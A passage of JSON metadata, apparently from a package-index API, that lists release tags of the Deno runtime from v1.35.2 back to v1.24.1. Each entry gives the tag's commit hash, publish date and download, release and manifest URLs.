"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.g